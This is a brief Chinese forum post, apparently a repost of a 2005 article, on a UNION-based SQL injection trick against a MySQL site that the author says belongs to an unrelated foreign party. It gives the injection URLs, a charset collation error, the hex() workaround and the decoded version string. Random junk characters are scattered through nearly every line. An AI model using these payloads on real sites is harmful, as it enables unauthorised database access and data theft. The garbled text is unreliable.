本文作者:SuperHei4 G0 X# ~ j6 H |* `8 J3 w% d
文章性质:原创
( O. H) T2 R7 \! J+ U发布日期:2005-10-18
7 D6 g7 ^, X$ W/ B3 r测试个国外的站时:
, t2 @: ~% \' }5 j3 Zurl:?c_id=2%20and%201=2%20union%20select%201,version(),3,4,5,6%20/*
& r% @# r. B9 l: z, b0 _返回错误:! C6 m; }% u( @1 p2 T5 u( n) c
Illegal mix of collations (euckr_korean_ci,IMPLICIT) and (utf8_general_ci,IMPLICIT) for operation 'UNION'
" j( E) O- v6 S6 t$ }; @9 mMySQL Error No. 126) b! X" B& `: r) Q! D h
看来是union查询前后字符集(http://dev.mysql.com/doc/mysql/en/Charset-collation-charset.html)不同出现的。
9 g4 L; G; S% p解决办法:转为其他编码如hex。0 j/ K) e2 i6 t& f/ P5 `+ ?
url:?c_id=2%20and%201=2%20union%20select%201,hex(version()),3,4,5,6%20/*
5 F* p. a( y2 ~; K, ~; w& c成功得到hex(version())的值为:9 E8 u/ {/ q3 U2 t& m5 e' V
342E312E332D62657461/ ?3 ~! D% ~2 G! Y c: i6 n9 _
回Mysql查询下得到:0 D9 r) @: k# L/ X& x5 n; _" g* Q2 S7 e
mysql> select 0x342E312E332D62657461;1 L- ]& |: F/ X9 m3 r
+------------------------+$ D1 _* v& a4 ~' Q; {2 `
| 0x342E312E332D62657461 |$ H5 {5 ?0 O, G9 m
+------------------------+
+ x2 P: o/ c$ A% y. ~! q| 4.1.3-beta |
3 z+ @6 X2 ~+ o& W3 x7 W8 H6 J+------------------------+% E! f: F7 Q5 j/ _7 k1 Q) @: w
1 row in set (0.00 sec); s) E# b! s% j: M# J6 G# E! i
- v. ~6 E( V4 P# h* g) y |
发表于 2012-9-15 14:04:54
收藏
支持
反对